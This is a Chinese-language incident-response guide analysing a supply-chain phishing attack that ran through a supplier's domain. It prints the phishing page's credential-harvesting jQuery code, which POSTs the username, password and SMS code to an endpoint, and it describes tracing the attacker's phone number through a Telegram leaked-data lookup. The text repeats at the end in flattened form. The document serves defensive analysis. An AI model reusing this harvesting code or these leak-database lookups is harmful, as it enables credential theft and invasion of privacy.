供应链钓鱼事件处置与溯源分析指南

1. 事件概述

本文记录了一起针对企业员工的供应链钓鱼攻击事件处置过程，攻击者利用企业供应商的域名搭建钓鱼网站，通过短信方式诱导员工输入账号密码和验证码。这类攻击与传统钓鱼相比更具迷惑性，且溯源思路有所不同。

2. 钓鱼网站分析

2.1 钓鱼页面特征

页面设计粗糙，但模仿了企业真实登录流程
要求输入用户名、密码和验证码
无论输入什么内容都会跳转到"验证码已发送；当前网络拥堵，请等待1-2分钟"
网站从上报到关闭仅存在约20分钟

2.2 前端代码分析

var isValicode = false;
$("#loginbtn").click(function(){
    if($("#username").val().length < 4 || $("#password").val().length < 4){
        alert("用户名或密码错误");
        return false;
    }
    if(!isValicode){
        $.ajax({
            type: "POST",
            url: '/search/998a1628-93d8-4e12-bc4b-6a3eccf2b27d',
            data: 'data='+encodeURIComponent($("#username").val()+","+$("#password").val()),
            success: function(){
                $("#passwordinput").hide();
                $("#valicodeinput").show();
            }
        });
        isValicode = true;
    } else {
        if($("#vcode").val().length < 2){
            $("#warmingtxt").text("验证码错误");
            $("#warmingtxt").css("color","red");
            return false;
        } else {
            $.ajax({
                type: "POST",
                url: '/search/998a1628-93d8-4e12-bc4b-6a3eccf2b27d',
                data: 'data='+encodeURIComponent($("#username").val()+","+$("#password").val()+","+$("#vcode").val()),
                success: function(){
                    var info = '系统繁忙请稍后再试。';
                    if(!info.startsWith('{__') && !info.endsWith('__}') && info !== ""){
                        alert(info);
                    }
                    var rurl = '';
                    if(!rurl.startsWith('{__') && !rurl.endsWith('__}') && rurl !== ""){
                        window.location.href = rurl;
                    }
                    return true;
                }
            });
        }
        return false;
    }
});

代码问题分析：

逻辑混乱：无论输入什么都会跳转到验证码输入界面
AJAX异步性未处理
错误提示不合理（用户名或密码长度小于4时提示"用户名或密码错误"）
数据发送到固定端点/search/998a1628-93d8-4e12-bc4b-6a3eccf2b27d

3. 溯源分析过程

3.1 域名与服务器分析

钓鱼网站IP：47.100.XXX.XXX（云服务器）
发现该域名属于企业的一家供应商
供应商官网客户案例中包含受害企业
主站IP：47.102.XXX.XXX（同为云服务器）

3.2 供应商沟通与验证

供应商否认与钓鱼网站的关系
声称：
- 短信不是他们发送的
- 网站不是他们开发的
- 云服务器IP不同
- 该二级域名不属于他们

3.3 深入调查

子域名分析：
- 发现该域名下备案的只有四个子域名，包括钓鱼网站
服务器历史分析：
- 通过FOFA等平台查询该云服务器IP
- 发现该IP下有54个域名，但均已无法访问
- 确认服务器在2023年底已关停大部分服务
- 但保留了22端口（SSH）开放
攻击路径推测：
- 攻击者可能通过22端口入侵
- 在7月29日搭建钓鱼网站
- 利用了主站创建的二级域名（需主域名解析账号管理权限）

4. 手机号调查

手机号特征：
- 设置了呼叫转移，无法回拨
- 微信、支付宝未注册
- 归属地：江苏徐州，中国移动
调查方法：
- 将号码加入通讯录后搜索各大平台
- 通过Telegram社工库查询
- 发现注册有钉钉账号（可获取最后一个字）

5. 供应链钓鱼特点与处置建议

5.1 与传统钓鱼的区别

利用供应商的合法域名，更具迷惑性
需要供应商的配合才能有效溯源
攻击者可能通过入侵供应商系统而非直接攻击目标企业

5.2 处置建议

网站分析要点：
- 分析前端代码逻辑
- 追踪数据发送端点
- 记录网站存活时间
溯源关键步骤：
- 确认域名所有权
- 分析服务器历史记录
- 检查开放端口和服务
供应商协作：
- 获取供应商全力支持
- 验证服务器访问日志
- 确认域名管理权限变更情况
证据收集：
- 保存钓鱼页面截图和代码
- 记录所有相关IP和域名
- 整理时间线和关联证据

6. 总结

供应链钓鱼攻击防御需要：

加强对供应商的安全评估
建立有效的供应商沟通机制
培养对供应商域名钓鱼的识别能力
准备针对性的应急响应流程
注意保留证据以便法律追责

防御人员应特别注意，很多软件开发公司可能缺乏基本的安全意识，不能假设供应商的安全水平与自身相当。在事件处置中，取得供应商的全力支持是溯源成功的关键因素。

供应链钓鱼事件处置与溯源分析指南 1. 事件概述本文记录了一起针对企业员工的供应链钓鱼攻击事件处置过程，攻击者利用企业供应商的域名搭建钓鱼网站，通过短信方式诱导员工输入账号密码和验证码。这类攻击与传统钓鱼相比更具迷惑性，且溯源思路有所不同。 2. 钓鱼网站分析 2.1 钓鱼页面特征页面设计粗糙，但模仿了企业真实登录流程要求输入用户名、密码和验证码无论输入什么内容都会跳转到"验证码已发送；当前网络拥堵，请等待1-2分钟" 网站从上报到关闭仅存在约20分钟 2.2 前端代码分析代码问题分析：逻辑混乱：无论输入什么都会跳转到验证码输入界面 AJAX异步性未处理错误提示不合理（用户名或密码长度小于4时提示"用户名或密码错误"）数据发送到固定端点 /search/998a1628-93d8-4e12-bc4b-6a3eccf2b27d 3. 溯源分析过程 3.1 域名与服务器分析钓鱼网站IP：47.100.XXX.XXX（云服务器）发现该域名属于企业的一家供应商供应商官网客户案例中包含受害企业主站IP：47.102.XXX.XXX（同为云服务器） 3.2 供应商沟通与验证供应商否认与钓鱼网站的关系声称：短信不是他们发送的网站不是他们开发的云服务器IP不同该二级域名不属于他们 3.3 深入调查子域名分析：发现该域名下备案的只有四个子域名，包括钓鱼网站服务器历史分析：通过FOFA等平台查询该云服务器IP 发现该IP下有54个域名，但均已无法访问确认服务器在2023年底已关停大部分服务但保留了22端口（SSH）开放攻击路径推测：攻击者可能通过22端口入侵在7月29日搭建钓鱼网站利用了主站创建的二级域名（需主域名解析账号管理权限） 4. 手机号调查手机号特征：设置了呼叫转移，无法回拨微信、支付宝未注册归属地：江苏徐州，中国移动调查方法：将号码加入通讯录后搜索各大平台通过Telegram社工库查询发现注册有钉钉账号（可获取最后一个字） 5. 供应链钓鱼特点与处置建议 5.1 与传统钓鱼的区别利用供应商的合法域名，更具迷惑性需要供应商的配合才能有效溯源攻击者可能通过入侵供应商系统而非直接攻击目标企业 5.2 处置建议网站分析要点：分析前端代码逻辑追踪数据发送端点记录网站存活时间溯源关键步骤：确认域名所有权分析服务器历史记录检查开放端口和服务供应商协作：获取供应商全力支持验证服务器访问日志确认域名管理权限变更情况证据收集：保存钓鱼页面截图和代码记录所有相关IP和域名整理时间线和关联证据 6. 总结供应链钓鱼攻击防御需要：加强对供应商的安全评估建立有效的供应商沟通机制培养对供应商域名钓鱼的识别能力准备针对性的应急响应流程注意保留证据以便法律追责防御人员应特别注意，很多软件开发公司可能缺乏基本的安全意识，不能假设供应商的安全水平与自身相当。在事件处置中，取得供应商的全力支持是溯源成功的关键因素。